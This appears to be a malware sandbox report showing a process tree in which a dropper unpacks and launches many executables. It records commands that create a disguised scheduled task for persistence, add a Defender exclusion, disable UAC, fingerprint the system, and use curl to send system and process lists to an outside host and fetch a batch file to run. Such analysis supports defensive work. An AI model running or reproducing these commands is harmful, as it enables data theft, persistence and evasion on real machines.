                                                                    • C:\Windows\System32\spoolsv.exe
                                                                      C:\Windows\System32\spoolsv.exe
                                                                      1⤵
                                                                        PID:1560
                                                                      • C:\Windows\System32\svchost.exe
                                                                        C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                                        1⤵
                                                                          PID:2072
                                                                        • C:\Windows\System32\svchost.exe
                                                                          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                                          1⤵
                                                                            PID:2292
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                            1⤵
                                                                              PID:2312
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                              1⤵
                                                                                PID:2440
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                                1⤵
                                                                                  PID:2448
                                                                                • C:\Windows\system32\svchost.exe
                                                                                  C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                                  1⤵
                                                                                    PID:2640
                                                                                  • C:\Windows\system32\svchost.exe
                                                                                    C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                                    1⤵
                                                                                      PID:2784
                                                                                    • C:\Windows\sysmon.exe
                                                                                      C:\Windows\sysmon.exe
                                                                                      1⤵
                                                                                        PID:2796
                                                                                      • C:\Windows\system32\svchost.exe
                                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                                        1⤵
                                                                                          PID:2808
                                                                                        • C:\Windows\system32\svchost.exe
                                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                                          1⤵
                                                                                            PID:2852
                                                                                          • C:\Windows\System32\svchost.exe
                                                                                            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                                            1⤵
                                                                                              PID:2860
                                                                                            • C:\Windows\system32\wbem\unsecapp.exe
                                                                                              C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                              1⤵
                                                                                                PID:2964
                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                                                1⤵
                                                                                                  PID:744
                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                  C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                                  1⤵
                                                                                                    PID:3424
                                                                                                  • C:\Windows\Explorer.EXE
                                                                                                    C:\Windows\Explorer.EXE
                                                                                                    1⤵
                                                                                                      PID:3520
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"
                                                                                                        2⤵
                                                                                                        • Checks computer location settings
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                        PID:2480
                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          3⤵
                                                                                                            PID:536
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\a\random.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\a\random.exe"
                                                                                                            3⤵
                                                                                                            • Checks computer location settings
                                                                                                            • Executes dropped EXE
                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                            PID:2648
                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
                                                                                                              4⤵
                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                              PID:4072
                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                5⤵
                                                                                                                  PID:4444
                                                                                                                • C:\Windows\system32\mode.com
                                                                                                                  mode 65,10
                                                                                                                  5⤵
                                                                                                                    PID:4808
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                                                                                                    7z.exe e file.zip -p24291711423417250691697322505 -oextracted
                                                                                                                    5⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Loads dropped DLL
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:5008
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                                                                                                    7z.exe e extracted/file_7.zip -oextracted
                                                                                                                    5⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Loads dropped DLL
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:4868
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                                                                                                    7z.exe e extracted/file_6.zip -oextracted
                                                                                                                    5⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Loads dropped DLL
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:992
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                                                                                                    7z.exe e extracted/file_5.zip -oextracted
                                                                                                                    5⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Loads dropped DLL
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:3044
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                                                                                                    7z.exe e extracted/file_4.zip -oextracted
                                                                                                                    5⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Loads dropped DLL
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:3908
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                                                                                                    7z.exe e extracted/file_3.zip -oextracted
                                                                                                                    5⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Loads dropped DLL
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:2544
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                                                                                                    7z.exe e extracted/file_2.zip -oextracted
                                                                                                                    5⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Loads dropped DLL
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:5068
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                                                                                                    7z.exe e extracted/file_1.zip -oextracted
                                                                                                                    5⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Loads dropped DLL
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:4712
                                                                                                                  • C:\Windows\system32\attrib.exe
                                                                                                                    attrib +H "in.exe"
                                                                                                                    5⤵
                                                                                                                    • Views/modifies file attributes
                                                                                                                    PID:892
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\main\in.exe
                                                                                                                    "in.exe"
                                                                                                                    5⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                    PID:872
                                                                                                                    • C:\Windows\SYSTEM32\attrib.exe
                                                                                                                      attrib +H +S C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                                                                                      6⤵
                                                                                                                      • Views/modifies file attributes
                                                                                                                      PID:2664
                                                                                                                    • C:\Windows\SYSTEM32\attrib.exe
                                                                                                                      attrib +H C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                                                                                      6⤵
                                                                                                                      • Views/modifies file attributes
                                                                                                                      PID:3180
                                                                                                                    • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                      schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
                                                                                                                      6⤵
                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                      PID:4616
                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      powershell ping 127.0.0.1; del in.exe
                                                                                                                      6⤵
                                                                                                                      • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                      PID:1104
                                                                                                                      • C:\Windows\system32\PING.EXE
                                                                                                                        "C:\Windows\system32\PING.EXE" 127.0.0.1
                                                                                                                        7⤵
                                                                                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                        • Runs ping.exe
                                                                                                                        PID:4368
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\a\client.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\a\client.exe"
                                                                                                                3⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                PID:4560
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\a\l4.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\a\l4.exe"
                                                                                                                3⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                PID:1664
                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  4⤵
                                                                                                                    PID:2696
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\onefile_1664_133785010349282403\l4.exe
                                                                                                                    C:\Users\Admin\AppData\Local\Temp\a\l4.exe
                                                                                                                    4⤵
                                                                                                                    • Drops startup file
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Loads dropped DLL
                                                                                                                    PID:1356
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\a\W4KLQf7.exe
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\a\W4KLQf7.exe"
                                                                                                                  3⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                  PID:4820
                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Microsoft\Windows\hyper-v.exe"
                                                                                                                    4⤵
                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                    PID:6436
                                                                                                                  • C:\Windows\SysWOW64\systeminfo.exe
                                                                                                                    systeminfo
                                                                                                                    4⤵
                                                                                                                    • Gathers system information
                                                                                                                    PID:2356
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe"
                                                                                                                  3⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                  PID:3044
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe
                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe"
                                                                                                                    4⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                    PID:1800
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1296
                                                                                                                      5⤵
                                                                                                                      • Program crash
                                                                                                                      PID:5860
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe"
                                                                                                                  3⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Adds Run key to start application
                                                                                                                  • Drops file in Program Files directory
                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                  PID:3976
                                                                                                                  • C:\Program Files\Windows Media Player\graph\graph.exe
                                                                                                                    "C:\Program Files\Windows Media Player\graph\graph.exe"
                                                                                                                    4⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    PID:5108
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\a\Z9Pp9pM.exe
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\a\Z9Pp9pM.exe"
                                                                                                                  3⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                  PID:960
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe"
                                                                                                                  3⤵
                                                                                                                  • Checks computer location settings
                                                                                                                  • Executes dropped EXE
                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                  PID:4732
                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
                                                                                                                    4⤵
                                                                                                                      PID:2780
                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                        5⤵
                                                                                                                          PID:2420
                                                                                                                        • C:\Windows\system32\mode.com
                                                                                                                          mode 65,10
                                                                                                                          5⤵
                                                                                                                            PID:5544
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                                                                                                            7z.exe e file.zip -p24291711423417250691697322505 -oextracted
                                                                                                                            5⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Loads dropped DLL
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:5152
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                                                                                                            7z.exe e extracted/file_7.zip -oextracted
                                                                                                                            5⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Loads dropped DLL
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:5644
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                                                                                                            7z.exe e extracted/file_6.zip -oextracted
                                                                                                                            5⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Loads dropped DLL
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:2356
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                                                                                                            7z.exe e extracted/file_5.zip -oextracted
                                                                                                                            5⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Loads dropped DLL
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:3188
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                                                                                                            7z.exe e extracted/file_4.zip -oextracted
                                                                                                                            5⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Loads dropped DLL
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:1620
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                                                                                                            7z.exe e extracted/file_3.zip -oextracted
                                                                                                                            5⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Loads dropped DLL
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:2824
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                                                                                                            7z.exe e extracted/file_2.zip -oextracted
                                                                                                                            5⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Loads dropped DLL
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:3772
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                                                                                                            7z.exe e extracted/file_1.zip -oextracted
                                                                                                                            5⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Loads dropped DLL
                                                                                                                            PID:3156
                                                                                                                          • C:\Windows\system32\attrib.exe
                                                                                                                            attrib +H "in.exe"
                                                                                                                            5⤵
                                                                                                                            • Views/modifies file attributes
                                                                                                                            PID:3888
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\main\in.exe
                                                                                                                            "in.exe"
                                                                                                                            5⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            PID:1532
                                                                                                                            • C:\Windows\SYSTEM32\attrib.exe
                                                                                                                              attrib +H +S C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                                                                                              6⤵
                                                                                                                              • Views/modifies file attributes
                                                                                                                              PID:3988
                                                                                                                            • C:\Windows\SYSTEM32\attrib.exe
                                                                                                                              attrib +H C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                                                                                              6⤵
                                                                                                                              • Views/modifies file attributes
                                                                                                                              PID:5680
                                                                                                                            • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                              schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
                                                                                                                              6⤵
                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                              PID:4656
                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              powershell ping 127.0.0.1; del in.exe
                                                                                                                              6⤵
                                                                                                                              • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                              PID:3972
                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                "C:\Windows\system32\PING.EXE" 127.0.0.1
                                                                                                                                7⤵
                                                                                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                • Runs ping.exe
                                                                                                                                PID:5696
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe"
                                                                                                                        3⤵
                                                                                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                        • Checks BIOS information in registry
                                                                                                                        • Checks computer location settings
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Identifies Wine through registry keys
                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                        • Checks processor information in registry
                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                        PID:4656
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe" & rd /s /q "C:\ProgramData\7YCBIE37YCBA" & exit
                                                                                                                          4⤵
                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                          PID:552
                                                                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                                                                            timeout /t 10
                                                                                                                            5⤵
                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                            • Delays execution with timeout.exe
                                                                                                                            PID:5172
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe"
                                                                                                                        3⤵
                                                                                                                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                        PID:2216
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe"
                                                                                                                        3⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                                        PID:5496
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          cmd /c systeminfo > tmp.txt && tasklist >> tmp.txt
                                                                                                                          4⤵
                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                          PID:3784
                                                                                                                          • C:\Windows\SysWOW64\systeminfo.exe
                                                                                                                            systeminfo
                                                                                                                            5⤵
                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                            • Gathers system information
                                                                                                                            PID:4500
                                                                                                                          • C:\Windows\SysWOW64\tasklist.exe
                                                                                                                            tasklist
                                                                                                                            5⤵
                                                                                                                            • Enumerates processes with tasklist
                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:6040
                                                                                                                        • C:\Windows\SysWOW64\curl.exe
                                                                                                                          curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C615C4D3569465232302E657865" -X POST -H "X-Auth: 2F4F464741445553452F41646D696E2F32" -H "X-Sec-Id: 0" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"
                                                                                                                          4⤵
                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                          PID:5812
                                                                                                                        • C:\Windows\SysWOW64\curl.exe
                                                                                                                          curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C615C4D3569465232302E657865" -H "X-Auth: 2F4F464741445553452F41646D696E2F32" -H "X-Sec-Id: 3" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/"
                                                                                                                          4⤵
                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                          PID:4904
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          cmd /c type "C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe" > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe"
                                                                                                                          4⤵
                                                                                                                          • Drops startup file
                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                          PID:1772
                                                                                                                        • C:\Windows\SysWOW64\curl.exe
                                                                                                                          curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C615C4D3569465232302E657865" -H "X-Auth: 2F4F464741445553452F41646D696E2F32" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/"
                                                                                                                          4⤵
                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                          PID:1416
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          cmd /c "C:\Users\Admin\AppData\Local\Temp\tmp.bat" > C:\Users\Admin\AppData\Local\Temp\tmp.txt
                                                                                                                          4⤵
                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                          PID:5332
                                                                                                                        • C:\Windows\SysWOW64\curl.exe
                                                                                                                          curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C615C4D3569465232302E657865" -X POST -H "X-Auth: 2F4F464741445553452F41646D696E2F32" -H "X-Sec-Id: 1" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"
                                                                                                                          4⤵
                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                          PID:5244
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\a\networkmanager.exe
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\a\networkmanager.exe"
                                                                                                                        3⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Adds Run key to start application
                                                                                                                        PID:5372
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe"
                                                                                                                        3⤵
                                                                                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                        • Checks BIOS information in registry
                                                                                                                        • Checks computer location settings
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Identifies Wine through registry keys
                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                        • Suspicious behavior: AddClipboardFormatListener
                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                        PID:6072
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\bbvlnu.exe
                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\bbvlnu.exe"
                                                                                                                          4⤵
                                                                                                                          • Checks computer location settings
                                                                                                                          • Executes dropped EXE
                                                                                                                          PID:6008
                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            5⤵
                                                                                                                              PID:5420
                                                                                                                            • C:\Windows\system32\wermgr.exe
                                                                                                                              "C:\Windows\system32\wermgr.exe" "-outproc" "0" "6008" "2444" "2336" "2448" "0" "0" "2452" "0" "0" "0" "0" "0"
                                                                                                                              5⤵
                                                                                                                              • Checks processor information in registry
                                                                                                                              • Enumerates system info in registry
                                                                                                                              PID:696
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\aysnfp.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\aysnfp.exe"
                                                                                                                            4⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            PID:5272
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe
                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe"
                                                                                                                          3⤵
                                                                                                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                          • Checks BIOS information in registry
                                                                                                                          • Checks computer location settings
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Identifies Wine through registry keys
                                                                                                                          • Loads dropped DLL
                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                          • Checks processor information in registry
                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:1896
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp7990.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp7990.tmp.bat
                                                                                                                            4⤵
                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                            PID:2428
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe
                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe"
                                                                                                                          3⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Adds Run key to start application
                                                                                                                          • Drops file in Program Files directory
                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                          PID:4564
                                                                                                                          • C:\Program Files\Windows Media Player\graph\graph.exe
                                                                                                                            "C:\Program Files\Windows Media Player\graph\graph.exe"
                                                                                                                            4⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            PID:2984
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\a\RMX.exe
                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\a\RMX.exe"
                                                                                                                          3⤵
                                                                                                                          • Adds policy Run key to start application
                                                                                                                          • Checks computer location settings
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Adds Run key to start application
                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                          • Modifies registry class
                                                                                                                          PID:728
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                                                                                            4⤵
                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                            PID:6084
                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              5⤵
                                                                                                                                PID:5992
                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                                                                                                5⤵
                                                                                                                                • UAC bypass
                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                • Modifies registry key
                                                                                                                                PID:2196
                                                                                                                            • C:\Windows\SysWOW64\WScript.exe
                                                                                                                              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\install.vbs"
                                                                                                                              4⤵
                                                                                                                              • Checks computer location settings
